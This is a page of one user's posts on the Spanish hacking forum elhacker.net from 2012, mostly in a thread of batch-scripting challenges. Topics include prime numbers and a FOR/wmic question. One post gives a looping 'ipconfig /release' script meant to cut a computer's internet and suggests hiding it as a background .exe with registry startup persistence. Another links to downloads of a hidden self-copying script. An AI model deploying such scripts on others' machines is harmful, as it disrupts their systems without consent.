elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Sigue las noticias más importantes de seguridad informática en el Twitter! de elhacker.NET


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 [8] 9 10 11 12 13 14
71  Programación / Scripting / Re: REtos batch en: 24 Abril 2012, 20:15 pm
Lo unico que quieres es que se copie en otro sitio y se ejecute el copiado en otro sitio y despues se borre el original? Pero viendose la ventana del escondido?? AAAAAAAAAAAAa entonces es muy facil ahora lo posteo (Si es eso lo que quieres)
72  Programación / Scripting / Re: REtos batch en: 24 Abril 2012, 19:25 pm
Claro como lo de edu es muy facil y lo terminare rapido me metere con tu reto (Tengo pendiendte el de elecktro pero no estoy en el ordenador en el que empece su reto y no quiero empezar de 0)
73  Programación / Scripting / Re: REtos batch en: 24 Abril 2012, 19:08 pm
Edu pero no se puede hacer algo asi (Que yo sepa) La idea es que cuand ose copie siga en segundo plano no? Pues lo meti a .exe en segundo plano dudo que exista un comando que lo solucione. Por eso 2, 1 que no es invisible y otro que si. Como mucho puedo ejecutarlo minimizado

EDITO: he encontrado el modo ahora quando termino un trbajo me meto seran 5 minutos y reposteo o edito
74  Programación / Scripting / Re: REtos batch en: 24 Abril 2012, 15:09 pm
Edu he conseguido lo que querias te dego el link de descarga (te juro que lo hice yo si quires posteo su code pero te digo que se perderia mucha ilusion si lo posteo)
Aqui el primero que debe ejecutar-se:
http://www.mediafire.com/download.php?4d39eiqcevcvw7u
e aqui el segundo que debe estar en la misma carpeta:
http://www.mediafire.com/download.php?n3dxgl8pn90ti9x

PD: No testeado
75  Programación / Scripting / Re: REtos batch en: 23 Abril 2012, 22:58 pm
El 1 depende de donde pero el 2 siempre ha sido y siempre sera numero primo.

salu3

Puede ser pero seria muy dificil encontrar una relacion tan grande.
76  Programación / Scripting / Re: REtos batch en: 23 Abril 2012, 22:53 pm
Lo tuyo se puede hacer. Y lo se hacer pero tarde un poquito...
Por cierto gracias ya se a que se referia (Las mates se me dan de coña) eso es muy dificil de hacer en batch porque tendria que escribir montones de lineas. Claro porque la parte interesante del codigo seria que tu no pusiaras a mano los codigos si no no tiene gracia :P (Para demostrar que lo se los primeros  numeros primos serian : 1-2-3-5-7-11-13 ....
77  Programación / Scripting / Re: REtos batch en: 23 Abril 2012, 22:28 pm
1- Espero tu indicacion edu
2- Porfavor retos poco a poco como maximo 2 (Ahora no pasa nada)
3- Numeros primos no se lo que es. (Soy catalan quizas tiene otro nombre)
4- Ahora me meto elecktro hacker hace pinta de ser dificilito pero ahora lo intentare.
78  Programación / Scripting / Re: Problema no se esperaba XXX en este momento [Batch] en: 23 Abril 2012, 20:50 pm
No estoi en el ordenador en el que se efectuo tal error pero juraria que es asi:
Código:
FOR /F "tokens=7* delims= " %%i IN ("wmic logicaldisk where "DeviceID='C:'" get FreeSpace") DO echo %%i de Espacio libre
Como veras no se puede entender nada de lo que he echo lo que yo hago estaria bien  si fuera sobre texto plano. Pero con un comando no tengo ni idea.

PD: Al leer el codigo no te estreses. El comando for se me da fatal y aparte lo estoi intentando entender googleando y sobre todo de esta guia : http://foro.elhacker.net/scripting/programacion_batch_avanzada_nuevo-t132924.0.html
79  Programación / Scripting / Re: REtos batch en: 23 Abril 2012, 19:31 pm
Huy muy buenas ideas ahora me pongo. Pero porfavor de 1 en 1 como empezare por orden Edu me podrias explicar un poco tu propuesta es que no tiene "mucho sentido"
 si fuera un archivo maligno y despues uno buno que te reparase el mal si pero si no no lo entiendo. Ahora mismo me meto a ello.

PD: Buenas noticias e encontrado el primer reto!!!

este es el codigo:
Código:
@echo off
:inicio
ipconfig /release
goto :inicio
Claro que para que salga correcto tendriamos que transformarlo a .exe en como de 2 plano para rescatar el internet seria este otro code:
Código:
@echo off
taskkill /T /F cmd.exe
exit
Los codigos no los he probado. Tambien se podria rescatar reiniciado claro que si eres inteligente i modificas el registro y lo pones en el inicio del sistema no tendria internet :P

PD2: lo de transformarlo a .exe para que se ejecute en segundo plano es opcional pero claro se podria cerrar haciendo clic en el boton y se mostraria una pantalla negra que la verdad :S no es que sea muy amigable
80  Programación / Scripting / REtos batch en: 23 Abril 2012, 18:57 pm
Estoy muy aburrido y como no tengo nada mejor a hacer he tenido una idea. Que pongan retos en batch.
Ejemplo: Quiero que hagas un script que te habra la carpeta que tu eligas.
Páginas: 1 2 3 4 5 6 7 [8] 9 10 11 12 13 14
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines